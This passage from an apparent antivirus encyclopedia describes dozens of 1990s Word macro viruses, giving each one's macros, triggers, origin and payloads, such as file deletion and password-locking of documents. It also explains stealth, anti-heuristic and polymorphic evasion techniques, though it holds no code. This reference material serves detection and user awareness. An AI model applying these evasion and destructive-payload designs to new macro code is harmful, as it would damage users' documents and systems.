Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: Yes
Description:
Swlabs.A infects the global template (normal.dot) when
an infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
Swlabs.A removes ToolsMacro and FileTemplates to make
recognition of an infected file more difficult (called
macro stealth technique).
It does not contain any payload only the following comment:
" What" No Payload? WUSSY! "
Swlabs.A is another virus that was created with a macro
virus generator.
[Word.Swlabs.B]
Virus name: Word.Swlabs.B
Virus Type: Word macro virus
Number of macros: 3
Encrypted: No
Macro names: AutoOpen, FileNew, FileSave
Size of macros: 2145 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
Swlabs.B infects the global template (normal.dot) when
an infected document is opened. Further documents become
infected when they are also opened (AutoOpen), created
(FileNew), or saved (FileSave).
Swlabs.B does not contain any destructive payload only the
following comment is added to the File|Properties\Summary|
Subject section:
" Green Bay Packers -- Super Bowl XXXI Champions "
Swlabs.B is another virus that was created with a macro
virus generator.
[Word.Talon.A]
Virus name: Word.Talon.A
Virus Type: Word macro virus
Number of macros: 6
Encrypted: Yes
Macro names: AOB, Deed, FSAB, Info, AutoOpen (FileSaveAs),
ToolsMacro
Size of macros: 2052 Bytes in documents
2008 Bytes in global template
Place of origin: USA
Date of origin: March 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Talon infects the global template (normal.dot) when an
infected document is opened (AutoOpen). Further documents
become infected when they are saved (FileSaveAs).
Talon triggers on June 18th. It then displays an unending
series of message boxes:
" Your System Is Infected With The Macro Virus Talon #1! "
" This Macro Virus Was Brought To You By: TALON 1997 ".
When the user tries to select the "ToolsMacro" menu option,
Talon displays the following information:
" Warning "
" This Option Is Not Available, Please Insert The MS-Office CD "
" And Install The Help Files To Continue. "
Additional information can be found in the "Info" macro:
" ********************************************* "
" Talon #1 "
" June 18 Payload Activates "
" Displays Message "
" All Files Encrypted Except Info File "
" "
" Brought To You By "
" "Talon" "
" ********************************************* "
[Word.Talon.B]
Virus name: Word.Talon.B
Virus Type: Word macro virus
Number of macros: 6
Encrypted: Yes
Macro names: AOB, FSAB, Info, AutoOpen (FileSaveAs),
ToolsMacro, Password
Size of macros: 1953 Bytes in documents
1887 Bytes in global template
Place of origin: USA
Date of origin: March 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Talon.B infects the global template (normal.dot) when an
infected document is opened (AutoOpen). Further documents
become infected when they are saved (FileSaveAs).
It triggers on the 27th of each month when it saves the active
document with the password " talon " and then displays the
following message:
" Warning "
" Your document Has Just been Been Saved, I Hope You Know "
" The Password!!! ", Brought To You By Talon 1997 "
Another difference between this new variant and the original
Talon virus is that the "ToolsMacro" menu option displays the
following information:
" This Option Is Not Available, Please Install The "
" Help Files To Continue. "
[Word.Talon.C]
Virus name: Word.Talon.C
Virus Type: Word macro virus
Number of macros: 6
Encrypted: Yes
Macro names: AOB, FSAB, Info, AutoOpen (FileSaveAs),
ToolsMacro, ToolsSpelling
Size of macros: 2001 Bytes in documents
1981 Bytes in global template
Place of origin: USA
Date of origin: March 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Talon.C infects the global template (normal.dot) when an
infected document is opened (AutoOpen). Further documents
become infected when they are saved (FileSaveAs).
It triggers on Mondays during the month of June. This
only happens when a user activates the spellchecker.
Talon.C then saves the active document with the password
" talon3 " and then loops through three message boxes:
" I Have A Word For You To Spell V I R U S "
" Your document Has Just been Been Saved By The Word Macro Virus "
" Talon #3, I Hope You Know The Password!!! "
" Brought To You By Talon 1997 "
Another difference between this new variant and the original
Talon virus is that the "ToolsMacro" menu option displays
the following information:
" This option is not available now. Please install the "
" HELP files To continue. "
[Word.Talon.D]
Virus name: Word.Talon.D
Virus Type: Word macro virus
Number of macros: 6
Encrypted: Yes
Macro names: Scramble, AutoClose, Info, AutoOpen, FileSaveAs,
ToolsMacro
Size of macros: 2079 Bytes
Place of origin: USA
Date of origin: April 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Talon.D infects the global template (normal.dot) when an
infected document is opened (AutoOpen). Further documents
become infected when they are saved (FileSaveAs) or closed
(AutoClose).
It triggers on Fridays when it saves the active document
with the password " talon4 " and then loops through the
following message boxes:
" Your document Is Infected With The Macro Virus Talon 4 "
" Your document Has Just been Been Saved, I Hope You Know "
" The Password!!! ",
" Talon Strikes Again 1997 "
Another difference between this new variant and the original
Talon virus is that the "ToolsMacro" menu option displays the
following information:
" This option is not available right now. Please install the "
" HELP files To continue. "
[Word.Talon.E]
Virus name: Word.Talon.E
Virus Type: Word macro virus
Number of macros: 7
Encrypted: Yes
Macro names: Scramble, AutoClose, Info, Menu, AutoOpen,
FileSaveAs, ToolsMacro
Size of macros: 2323 Bytes
Place of origin: USA
Date of origin: April 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Talon.E infects the global template (normal.dot) when an
infected document is opened (AutoOpen). Further documents
become infected when they are saved (FileSaveAs) or closed
(AutoClose).
The main difference between this new variant and the
previous Talon viruses is that this virus adds a new menu item
(Talon). When a user selects the item, Talon.E triggers and the
active document is saved with the password " talon5 ".
After that it enters a loop of message boxes:
" Thank You so Much For Pressing That Button, "
" I Thought I Would Never Be Activated. "
" Word Macro Virus Talon 5 "
" Talon Strikes Again "
Another difference between this new variant and the original
Talon virus is that the "ToolsMacro" menu option displays the
following information:
" This option is not available right now. Please install the "
" HELP files To continue. "
[Word.Talon.F]
Virus name: Word.Talon.F
Virus Type: Word macro virus
Number of macros: 6
Encrypted: Yes
Macro names: Scramble, AutoClose, Info, AutoOpen,
FileSaveAs, ToolsMacro
Size of macros: 2194 Bytes
Place of origin: USA
Date of origin: April 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Talon.F infects the global template (normal.dot) when an
infected document is opened (AutoOpen). Further documents
become infected when they are saved (FileSaveAs) or closed
(AutoClose).
The main difference between this new variant and the previous
Talon viruses is that the virus author tried the anti-heuristic
techniques.
Another difference between this new variant and the very
similar Talon.D variant is that the "ToolsMacro" menu option
displays the following information:
" Please Install The HELP Files To Continue "
" Option Not Installed "
[Word.Talon.G]
Virus name: Word.Talon.G
Virus Type: Word macro virus
Number of macros: 7
Encrypted: No
Macro names: Scramble, AutoClose, Scramble2, AutoOpen,
FileSaveAs, ToolsMacro, Mentor
Size of macros: 6280 Bytes
Place of origin: USA
Date of origin: April 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Talon.G infects the global template (normal.dot) when an
infected document is opened (AutoOpen). Further documents
become infected when they are saved (FileSaveAs) or closed
(AutoClose).
The main difference between this new variant and the
previous Talon viruses is that Talon.G adds two menu items
to the Help file (called "Talon 5" and "About Talon 5").
When selected, Talon triggers and displays an article from the
virus author in the Microsoft Word macro editor.
It then prints 999 copies of the article and displays the
following messages:
" Talon Strikes Again "
" Word Macro Virus Talon 5 AKA The Mentor "
[Word.Talon.H]
Virus name: Word.Talon.H
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: AutoClose, AutoOpen, Crud, FileSaveAs
Size of macros: 1923 Bytes
Place of origin: USA
Date of origin: April 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Talon.H infects the global template (normal.dot) when an
infected document is opened (AutoOpen). Further documents
become infected when they are saved (FileSaveAs) or closed
(AutoClose).
The main difference between this new variant and the
previous Talon viruses is that Talon.H adds two menu items
(called Eifel Crud).
When selected, Talon.H triggers and saves the active
document with the password " crud ".
After that it creates a new document with the following text:
" You are infected with the Eifel Crud! "
" Talon Strikes Again! 1997 "
Talon.H is another virus that devolves into Talon.H1 and
Talon.H2. This occurs when closing (AutoClose) a Talon.H infected
document and saving (FileSaveAs) a Talon.H1 infected file.
Due to the missing macros, Talon.H1 and Talon.H2 will
produce WordBasic error messages.
[Word.Target.B (a.k.a LoneStar, Lone)]
Virus name: Word.Target.B (a.k.a LoneStar, Lone)
Virus Type: Word macro virus
Number of macros: 1 (German version of Word)
2 (Any other version of Word)
Encrypted: Yes
Macro names: LoneRaider (LoneRaiderTwo)
Size of macros: 3463 Bytes
Place of origin: Germany
Date of origin: Unknown
Destructive: No
Common In-The-Wild: No
Target activates when the assigned key (SPACE) is pressed.
Target is an attempt to fool heuristic macro virus scanners. Its
virus macros do not contain the command to copy viruses.
Instead it creates a second macro (LoneRaiderTwo) and copies
all the commands for activation and infection into it. After
execution the second macro is deleted. As a result, some
heuristic scanners do not flag Target as suspicious. When
Target is activated from a non-German version of Microsoft
Word it will not spread and the second macro will not be
deleted.
Upon pressing "SPACE" on January 1st of each year, Target
creates a new document with the following text:
" Enjoy the first F/WIN Killer! "
" LoneRaider! "
" Nightmare Joker "
" 1996 "
When Target was released to the public, F-WIN Heuristic
Anti-Virus, written by Stefan Kurtzhals, was unable to detect
Target due to the reasons above. This was changed
immediately and every up-to-date anti-virus program should
be able to catch this virus.
[Word.Tear.A]
Virus name: Word.Tear.A
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: AutoOpen, FileSaveAs)
Size of macros: 1684 Bytes
Place of origin: Russia
Date of origin: April 1997
Destructive: No
Seen In-The-Wild: No
Description:
Tear.A infects the global template (normal.dot) when an infected
document is opened. Further documents become infected when
they are saved (FileSaveAs).
The following comments can be found in the "AutoOpen" macro
code:
" (c) 1997 Master of Infection "
" QUEEN FOREVER!!! "
" I love you,Freddie!!! "
" Here is my Mother's love!!! "
" I don't want to sleep with you "
" I don't need the passion too "
" I don't want a stormy affair "
" To make me feel my life is heading somewhere "
" All I want is comfort and care "
" Just to know that my woman gives me sweet - "
" Mother Love "
" I've walked too long in this lonely lane "
" I've had enough of this same old game "
" I'm a man of the world and they say that I'm strong "
" But my heart is heavy, and my hope is gone "
" Out in the city, in the cold world outside "
" I don't want to pity, just a safe place to hide "
" Mama please, let me back inside "
" I don't want to make no waves "
" But you can give me all the love that I crave "
" I can't take it if you see me cry "
" I long for peace before I die "
" All I want is to know that you're there "
" You're gonna give me all your sweet - "
" Mother Love "
" My body's aching, but I can't sleep "
" My dreams are all the company I keep "
" Got such a feeling as the sun goes down "
" I'm coming home to my sweet - "
" Mother Love "
When an infected document is opened, Tear displays the
following message:
" Tear it up! "
[Word.Tedious.A]
Virus name: Word.Tedious.A
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: AutoNew, FileSaveAs, VAutoNew, VFileSaveAs
Size of macros: 1082 Bytes
Place of origin: Unknown
Date of origin: August 1996
Payload: No
Common In-The-Wild: No
Description:
Tedious infects documents when the "FileSaveAs" command
is used. Infected documents are converted internally to
templates which is very common for macro viruses.
Since Tedious uses English macro names it will not work with
Non-English versions of Microsoft Word.
Even though one major US anti-virus company reported
Tedious as being destructive, users do not need to fear this
virus. Tedious is harmless and does nothing else besides
replicating.
[Word.Tele.A (a.k.a LBYNJ, Telefonica, Tele-Sex)]
Virus name: Word.Tele.A (a.k.a LBYNJ, Telefonica, Tele-Sex)
Virus Type: Word macro virus
Number of macros: 7
Encrypted: Yes
Macro names: AutoExec, AutoOpen, DateiBeenden, DateiDrucken,
DateiNeu, DateiOeffnen, Telefonica
Size of macros: 22256 Bytes
Place of origin: Germany
Date of origin: April 1996
Destructive: Yes
Common In-The-Wild: No
Description:
Tele's "AutoExec" macro includes the infection routine for the
global template (normal.dot), which will not get infected when
inside the WIN.INI file (entry "Compatibility"), the string
"0x0030303" is set to "LBYNJ".
Tele uses the "Telefonica" macro to check for a previous
infection. It will not infect the global template if the macro is
already present.
Documents are infected upon "DateiBeenden" ("FileClose"),
"DateiNeu" ("FileNew") and "DateiOeffnen" ("FileOpen"),
whereby at the end of "DateiOeffnen" ("FileOpen") the macro
"Telefonica" is called again. Infected documents are changed
to templates, which is very common for macro viruses.
Tele has two destructive payloads. The first one can be found
in the "DateiDrucken" (FilePrint) macro. Upon printing a
document, Tele checks the system time and in case of a
value less than 10 in the seconds field, it will add the
following text at the end of the printed document:
" Lucifer by Nightmare Joker (1996) "
The second payload is activated from the "Telefonica" macro
when the second field has a value of 0 or 1. ("Telefonica" is
called from "AutoOpen", "AutoExec" and "DateiOeffnen"). If
this is the case, Tele creates a Debug script, (filename:
TELEFONI.SCR), inside the "C:\DOS" directory which
includes the DOS-based virus "Kampana.3784".
After creating the script file, LBYNJ executes the
"TELEFONI.BAT" batch file which uses the DOS command
"DEBUG.EXE" to convert the script file into an executable
DOS-based virus and then starts it.
[Word.Temple.A]
Virus name: Word.Temple.A
Virus Type: Word macro virus
Number of macros: 4
Encrypted: No
Macro names: AutoOpen (TempAutoOpen), TempAutoExec (AutoExec)
TempFileOpen (FileOpen), TempFileSave (FileSave)
Size of macros: 1011 Bytes
Place of origin: Unknown
Date of origin: Spring 1997
Destructive: No
Seen In-The-Wild: No
Description:
Temple is another do-nothing macro virus. It is only infectious.
Temple.A infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen) or saved
(FileSaveAs).
[Word.Theatre.A (a.k.a Taiwan.Theater)]
Virus name: Word.Theatre.A (a.k.a Taiwan.Theater)
Virus Type: Word macro virus
Number of macros: 6
Encrypted: Yes
Macro names: AutoOpen, CK, CK1, DocClose, FileClose, ToolsMacro
Size of macros: 7495 Bytes
Place of origin: Taiwan
Date of origin: Unknown
Destructive: Yes
Seen In-The-Wild: No
Description:
Theatre is another macro virus written for the
Taiwanese/Chinese version of Microsoft Word.
It activates when an infected file is opened. Upon the 1st of
each month, Theatre triggers and deletes all the files in the
C:\ root directory. This leaves the computer unbootable.
The following messages are displayed:
" TAIWAN THEATRE VIRUS by Dark Word "
" Hay..Hay..YOU GOT A THEATRE VIRUS. "
[Word.Theater.B]
Virus name: Word.Theatre.B
Virus Type: Word macro virus
Number of macros: 4
Encrypted: Yes
Macro names: CK, DocClose, FileClose, ToolsMacro
Size of macros: 7495 Bytes
Place of origin: Taiwan
Date of origin: Unknown
Destructive: Yes
Seen In-The-Wild: No
Description:
Theatre.B is another macro virus written for the
Taiwanese/Chinese version of Microsoft Word.
The difference between this new variant and the original
Theatre virus is the trigger date and the displayed message.
Theatre.B deletes all the files in the C:\ root directory upon
reaching the 15th of each month.
It displays the following message:
" THEATRE "
Our Theatre.B virus sample also contains errors in the
"FileClose" macro, which results to no further infections.
[Word.Toten.A:De]
Virus name: Word.Toten.A:De
Virus Type: Word macro virus
Number of macros: 2
Encrypted: Yes
Macro names: README, AutoOpen (DateiSpeichern)
Size of macros: 2057 Bytes
Place of origin: Germany
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: Yes
Description:
Toten infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are saved (DateiSpeichern).
When Toten triggers, it encrypts documents with semi-random
passwords. If you find a document with an unknown password,
please download a copy of WinWord Password Recovery Tool
(wwprt). It is available at: www.vdsarg.com.
When a document is saved on February 1, 2000, Toten displays
the following German message:
" Der Virus wurde von M.N. aus Schwelm (BRD)am 08.06.1996 "
" programmiert. Ich bin ein Hosen Fan. "
Toten contains several other comments related to the German
punk music group: " Die Toten Hosen ".
Toten.A uses language specific macros, therefore it only
works with the German version of Microsoft Word.
[Word.Twister.A]
Virus name: Word.Twister.A
Virus Type: Word macro virus
Number of macros: 8
Encrypted: No
Macro names: FileSaveAs, AutoExec, twAC, FileSave, AutoExit,
twFC, twFE, twFQ, twFSA, twAE, AutoClose, twFS,
twEX, FileClose, FileExit, FileQuit
Size of macros: 4628 Bytes
Place of origin: Unknown
Date of origin: Unknown
Payload: No
Seen In-The-Wild: No
Description:
Twister is a very simple virus that does nothing but replicate.
It has 2 sets of macros: one for infecting the global template
the other for infecting documents. It swaps them upon activation
and upon infection.
The AutoExec macro contains the following text string:
" Twister 2000" v.1 (c) Neo-Luddite Inc. "
" For Robin Hood "
[Word.TWNO.A (a.k.a. Taiwan_1)]
Virus name: Word.TWNO.A (a.k.a. Taiwan_1)
Virus Type: Word macro virus
Number of macros: 1 or 3
Encrypted: No
Macro names: AutoOpen, AutoNew, AutoClose
Size of macros: 1567 Bytes in .doc files
4701 Bytes in global template
Place of origin: Taiwan
Date of origin: Unknown
Payload: Yes
Seen In-The-Wild: Yes
Description:
TWNO was the first macro virus written for the
Taiwanese/Chinese version of Microsoft Word.
TWNO infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are opened (AutoOpen), closed
(AutoClose) or when a new document is created (AutoNew).
While TWNO has only one macro in infected documents,
it copies and renames it to 3 macros in the global template.
On the 13th of each month TWNO inserts text into the active
document and then displays the following message:
" NO_1 Macro Virus "
[Word.TWNO.B (a.k.a. KillMario)]
Virus name: Word.TWNO.B (a.k.a. KillMario)
Virus Type: Word macro virus
Number of macros: 1 or 3
Encrypted: No
Macro names: AutoExec, AutoNew, AutoClose
Size of macros: 1387 Bytes in .doc files
4161 Bytes in global template
Place of origin: Taiwan
Date of origin: Unknown
Payload: No
Seen In-The-Wild: No
Description:
TWNO.B is another virus written for the Taiwanese/
Chinese version of Microsoft Word.
The difference between this new variant and the original
TWNO.A virus is that TWNO.B contains the "AutoExec"
macro instead of the "AutoOpen" macro.
The submitted first generation sample is also not capable of
further infecting documents. Microsoft Word is halted when
the user starts Word from an already infected global template.
[Word.TWNO.C]
Virus name: Word.TWNO.C
Virus Type: Word macro virus
Number of macros: 1 or 3 (global template)
Encrypted: No
Macro names: AutoOpen (AutoNew, AutoClose)
Size of macros: 1404 Bytes in documents
4212 Bytes in global template
Place of origin: Taiwan
Date of origin: Fall 1996
Destructive: Yes
Seen In-The-Wild: No
Description:
TWNO.C is another virus written for the Taiwanese/Chinese
version of Microsoft Word.
The difference between this new variant and the previous
TWNO.B virus is that it contains an "AutoOpen" macro
instead of "AutoExec".
TWNO.C infects the global template when an infected
document is opened. Further documents become infected
when they are closed (AutoClose), created (AutoNew) or
opened (AutoOpen).
While TWNO.B is not capable of further infecting documents,
TWNO.C is able to infect new documents and also execute its
destructive payloads.
On the 28th of each month, TWNO.C asks a question and
depending on the answer, it executes one of its two payloads:
1. It deletes CONFIG.SYS, AUTOEXEC.BAT, and COMMAND.COM!
2. It deletes all files in the C:\DOS and C:\ET3 directory.
On the 1st of each month, TWNO.C deletes the following files:
C:\COMMAND.COM
C:\AUTOEXEC.BAT
C:\CONFIG.SYS
[Word.TWNO.D]
Virus name: Word.TWNO.D
Virus Type: Word macro virus
Number of macros: 1 or 3 (global template)
Encrypted: No
Macro names: AutoOpen (AutoNew, AutoClose)
Size of macros: 2105 Bytes in documents
6315 Bytes in global template
Place of origin: Taiwan
Date of origin: Fall 1996
Destructive: Yes
Seen In-The-Wild: No
Description:
TWNO.D is another virus written for the Taiwanese/Chinese
version of Microsoft Word. Compared to previous TWNO
viruses, its WordBasic code has been rewritten.
TWNO.D infects the global template when an infected
document is opened. Further documents become infected when
they are closed (AutoClose), created (AutoNew) or opened
(AutoOpen).
On the 25th of each month, TWNO.D changes the Word
menubar items and then asks a question to the user. Depending
on the answer, it deletes the following files:
"C:\DOS\*.*"
"C:\WINDOWS\*.INI"
After that TWNO.D shows 3 different messages.
On the 15th of each month, TWNO.D deletes the following files:
"C:\COMMAND.COM"
"C:\CONFIG.SYS"
"C:\MSDOS.SYS"
"C:\IO.SYS"
[Word.TWNO.K]
Virus name: Word.TWNO.K
Virus Type: Word macro virus
Number of macros: 1 or 3 (global template)
Encrypted: No
Macro names: AutoOpen (AutoNew, AutoClose)
Size of macros: 1403 Bytes in documents
4209 Bytes in global template
Place of origin: Taiwan
Date of origin: Fall 1996
Destructive: Yes
Seen In-The-Wild: No
Description:
TWNO.K is another virus written for the Taiwanese/Chinese
version of Microsoft Word.
The difference between this new variant and the previous
TWNO.C virus is that the code was slightly modified.
TWNO.K infects the global template when an infected
document is opened. Further documents become infected when
they are closed (AutoClose), created (AutoNew) or opened
(AutoOpen).
For additional information, please refer to the TWNO.C virus
description.
[Word.TWNO.L]
Virus name: Word.TWNO.L
Virus Type: Word macro virus
Number of macros: 1 or 3 (global template)
Encrypted: No
Macro names: AutoOpen (AutoNew, AutoClose)
Size of macros: 1402 Bytes in documents
4206 Bytes in global template
Place of origin: Taiwan
Date of origin: Fall 1996
Destructive: Yes
Seen In-The-Wild: No
Description:
TWNO.L is another virus written for the Taiwanese/Chinese
version of Microsoft Word. The difference between this new
variant and the previous TWNO.C virus is that the code was
slightly modified.
TWNO.L infects the global template when an infected
document is opened. Further documents become infected
when they are closed (AutoClose), created (AutoNew) or
opened (AutoOpen).
For additional information, please refer to the TWNO.C virus
description.
[Word.TWNO.M]
Virus name: Word.TWNO.M
Virus Type: Word macro virus
Number of macros: 1 or 3 (global template)
Encrypted: No
Macro names: AutoOpen (AutoNew, AutoClose)
Size of macros: 1392 Bytes in documents
4176 Bytes in global template
Place of origin: Taiwan
Date of origin: Fall 1996
Destructive: Yes
Seen In-The-Wild: No
Description:
TWNO.M is another virus written for the Taiwanese/Chinese
version of Microsoft Word. The difference between this new
variant and the previous TWNO.C virus is that the code was
slightly modified.
TWNO.M infects the global template when an infected
document is opened. Further documents become infected
when they are closed (AutoClose), created (AutoNew) or
opened (AutoOpen).
For additional information, please refer to the TWNO.C virus
description.
[Word.TWNO.N]
Virus name: Word.TWNO.N
Virus Type: Word macro virus
Number of macros: 1 or 3 (global template)
Encrypted: No
Macro names: AutoOpen (AutoNew, AutoClose)
Size of macros: 1264 Bytes in documents
3792 Bytes in global template
Place of origin: Taiwan
Date of origin: Fall 1996
Destructive: Yes
Seen In-The-Wild: No
Description:
TWNO.N is another virus written for the Taiwanese/Chinese
version of Microsoft Word. The difference between this new
variant and the previous TWNO.C virus is that the code was
slightly modified.
TWNO.N infects the global template when an infected
document is opened. Further documents become infected
when they are closed (AutoClose), created (AutoNew) or
opened (AutoOpen).
For additional information, please refer to the TWNO.C virus
description.
[Word.TWNO.O]
Virus name: Word.TWNO.O
Virus Type: Word macro virus
Number of macros: 1 or 3 (global template)
Encrypted: No
Macro names: AutoOpen (AutoNew, AutoClose)
Size of macros: 1406 Bytes in documents
4218 Bytes in global template
Place of origin: Taiwan
Date of origin: Fall 1996
Destructive: Yes
Seen In-The-Wild: No
Description:
TWNO.O is another virus written for the Taiwanese/Chinese
version of Microsoft Word.
The difference between this new variant and the previous
TWNO.C virus is that the code was slightly modified.
TWNO.O infects the global template when an infected
document is opened. Further documents become infected
when they are closed (AutoClose), created (AutoNew) or
opened (AutoOpen).
For additional information, please refer to the TWNO.C virus
description.
[Word.TWNO.P]
Virus name: Word.TWNO.P
Virus Type: Word macro virus
Number of macros: 1 or 3 (global template)
Encrypted: No
Macro names: AutoOpen (AutoNew, AutoClose)
Size of macros: 1404 Bytes in documents
4212 Bytes in global template
Place of origin: Taiwan
Date of origin: Fall 1996
Destructive: Yes
Seen In-The-Wild: No
Description:
TWNO.P is another virus written for the Taiwanese/Chinese
version of Microsoft Word.
The difference between this new variant and the previous
TWNO.C virus is that the code was slightly modified.
TWNO.P infects the global template when an infected
document is opened. Further documents become infected
when they are closed (AutoClose), created (AutoNew) or
opened (AutoOpen).
For additional information, please refer to the TWNO.C virus
description.
[Word.TWNO.Q]
Virus name: Word.TWNO.Q
Virus Type: Word macro virus
Number of macros: 1 or 3 (global template)
Encrypted: No
Macro names: AutoOpen (AutoNew, AutoClose)
Size of macros: 1286 Bytes in documents
3858 Bytes in global template
Place of origin: Taiwan
Date of origin: Fall 1996
Destructive: Yes
Seen In-The-Wild: No
Description:
TWNO.Q is another virus written for the Taiwanese/Chinese
version of Microsoft Word.
The difference between this new variant and the previous
TWNO.C virus is that the code was slightly modified.
TWNO.Q infects the global template when an infected
document is opened. Further documents become infected
when they are closed (AutoClose), created (AutoNew) or
opened (AutoOpen).
For additional information, please refer to the TWNO.C virus
description.
[Word.TWNO.R]
Virus name: Word.TWNO.R
Virus Type: Word macro virus
Number of macros: 1 or 3 (global template)
Encrypted: No
Macro names: AutoOpen (AutoNew, AutoClose)
Size of macros: 1214 Bytes in documents
3642 Bytes in global template
Place of origin: Taiwan
Date of origin: Fall 1996
Destructive: Yes
Seen In-The-Wild: No
Description:
TWNO.R is another virus written for the Taiwanese/Chinese
version of Microsoft Word.
The difference between this new variant and the previous
TWNO.C virus is that the code was slightly modified.
TWNO.R infects the global template when an infected
document is opened. Further documents become infected
when they are closed (AutoClose), created (AutoNew) or
opened (AutoOpen).
For additional information, please refer to the TWNO.C virus
description.
[Word.TWNO.S]
Virus name: Word.TWNO.S
Virus Type: Word macro virus
Number of macros: 1 or 3 (global template)
Encrypted: No
Macro names: AutoOpen (AutoNew, AutoClose)
Size of macros: 1212 Bytes in documents
3636 Bytes in global template
Place of origin: Taiwan
Date of origin: Fall 1996
Destructive: Yes
Seen In-The-Wild: No
Description:
TWNO.S is another virus written for the Taiwanese/Chinese
version of Microsoft Word.
The difference between this new variant and the previous
TWNO.C virus is that the code was slightly modified.
TWNO.S infects the global template when an infected
document is opened. Further documents become infected
when they are closed (AutoClose), created (AutoNew) or
opened (AutoOpen).
For additional information, please refer to the TWNO.C virus
description.
[Word.TWNO.T]
Virus name: Word.TWNO.T
Virus Type: Word macro virus
Number of macros: 1 or 3 (global template)
Encrypted: No
Macro names: AutoOpen (AutoNew, AutoClose)
Size of macros: 1206 Bytes in documents
3618 Bytes in global template
Place of origin: Taiwan
Date of origin: Fall 1996
Destructive: Yes
Seen In-The-Wild: No
Description:
TWNO.T is another virus written for the Taiwanese/Chinese
version of Microsoft Word.
The difference between this new variant and the previous
TWNO.C virus is that the code was slightly modified.
TWNO.T infects the global template when an infected
document is opened. Further documents become infected
when they are closed (AutoClose), created (AutoNew) or
opened (AutoOpen).
For additional information, please refer to the TWNO.C virus
description.
[Word.TWNO.U]
Virus name: Word.TWNO.U
Virus Type: Word macro virus
Number of macros: 1 or 3 (global template)
Encrypted: No
Macro names: AutoOpen (AutoNew, AutoClose)
Size of macros: 970 Bytes in documents
2910 Bytes in global template
Place of origin: Taiwan
Date of origin: Fall 1996
Destructive: Yes
Seen In-The-Wild: No
Description:
TWNO.U is another virus written for the Taiwanese/Chinese
version of Microsoft Word.
The difference between this new variant and the previous
TWNO.C virus is that the code was slightly modified.
TWNO.U infects the global template when an infected
document is opened. Further documents become infected
when they are closed (AutoClose), created (AutoNew) or
opened (AutoOpen).
For additional information, please refer to the TWNO.C virus
description.
[Word.TWNO.V]
Virus name: Word.TWNO.V
Virus Type: Word macro virus
Number of macros: 1 or 3 (global template)
Encrypted: No
Macro names: AutoOpen (AutoNew, AutoClose)
Size of macros: 924 Bytes in documents
2772 Bytes in global template
Place of origin: Taiwan
Date of origin: Fall 1996
Destructive: Yes
Seen In-The-Wild: No
Description:
TWNO.V is another virus written for the Taiwanese/Chinese
version of Microsoft Word.
The difference between this new variant and the previous
TWNO.C virus is that the code was slightly modified.
TWNO.V infects the global template when an infected
document is opened. Further documents become infected
when they are closed (AutoClose), created (AutoNew) or
opened (AutoOpen).
For additional information, please refer to the TWNO.C virus
description.
[Word.TWNO.W]
Virus name: Word.TWNO.W
Virus Type: Word macro virus
Number of macros: 1 or 3 (global template)
Encrypted: No
Macro names: AutoOpen (AutoNew, AutoClose)
Size of macros: 888 Bytes in documents
2664 Bytes in global template
Place of origin: Taiwan
Date of origin: Fall 1996
Destructive: Yes
Seen In-The-Wild: No
Description:
TWNO.W is another virus written for the Taiwanese/Chinese
version of Microsoft Word.
The difference between this new variant and the previous
TWNO.C virus is that the code was slightly modified.
TWNO.W infects the global template when an infected
document is opened. Further documents become infected
when they are closed (AutoClose), created (AutoNew) or
opened (AutoOpen).
For additional information, please refer to the TWNO.C virus
description.
[Word.TWNO.X]
Virus name: Word.TWNO.X
Virus Type: Word macro virus
Number of macros: 1 or 3 (global template)
Encrypted: No
Macro names: AutoOpen (AutoNew, AutoClose)
Size of macros: 872 Bytes in documents
2616 Bytes in global template
Place of origin: Taiwan
Date of origin: Fall 1996
Destructive: Yes
Seen In-The-Wild: No
Description:
TWNO.X is another virus written for the Taiwanese/Chinese
version of Microsoft Word.
The difference between this new variant and the previous
TWNO.C virus is that the code was slightly modified.
TWNO.X infects the global template when an infected
document is opened. Further documents become infected
when they are closed (AutoClose), created (AutoNew) or
opened (AutoOpen).
For additional information, please refer to the TWNO.C virus
description.
[Word.TwoLines.A]
Virus name: Word.TwoLines.A
Virus Type: Word macro virus
Number of macros: 5 and 4 for A1
Encrypted: Yes
Macro names: MSRun, AutoExec, AutoOpen, AutoClose, FileSaveAs
Size of macros: 1817 Bytes or 1767 Bytes
Place of origin: Unknown
Date of origin: February 1997
Destructive: No
Common In-The-Wild: No
Description:
TwoLines infects the global template when an infected
document is opened (AutoOpen) or closed (AutoClose).
As the name suggests it adds 2 empty lines to the active
document when the minute field of the system time shows
20 minutes. Responsible for this action is the "MsRun" macro.
The "FileSaveAs" macro converts documents to templates, yet
does not infect them.
Twolines.A devolves into Twolines.A1, which does not contain
the "FileSaveAs" macro.
For this to happen certain conditions have to be present:
1. Automacros are disabled when opening an infected document.
2. Document is closed (AutoClose).
3. Global template contains macros.
[Word.UglyKid.A]
Virus name: Word.Uglykid.A
Virus Type: Word macro virus
Number of macros: 3-4
Encrypted: Yes
Macro names: AutoOpen, (ToolsMacro, FileSave)
Size of macros: Polymorphic
Place of origin: Slovakia
Date of origin: April 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Uglykid.A is another Polymorphic macro virus, that can not be
detected with a simple signature or with exact CRC detection.
UglyKid.A uses "ToolsMacro" to make recognition of an
infected document more difficult (called macro stealth technique).
It also removes the File|Templates menu item so users can
not look for viral macros on an infected system.
It is advised not to select the "ToolsMacro" menu item, since
it is used to execute the virus code.
UglyKid.A also infects further documents when the "FileSave"
command is used.
While most other Polymorphic viruses are fairly slow and
visible to the user, UglyKid.A tries to hide the macro editing
bar. Instead it shows a gray bar for a very short time.
The payload of UglyKid.A changes the "User Info" item in the
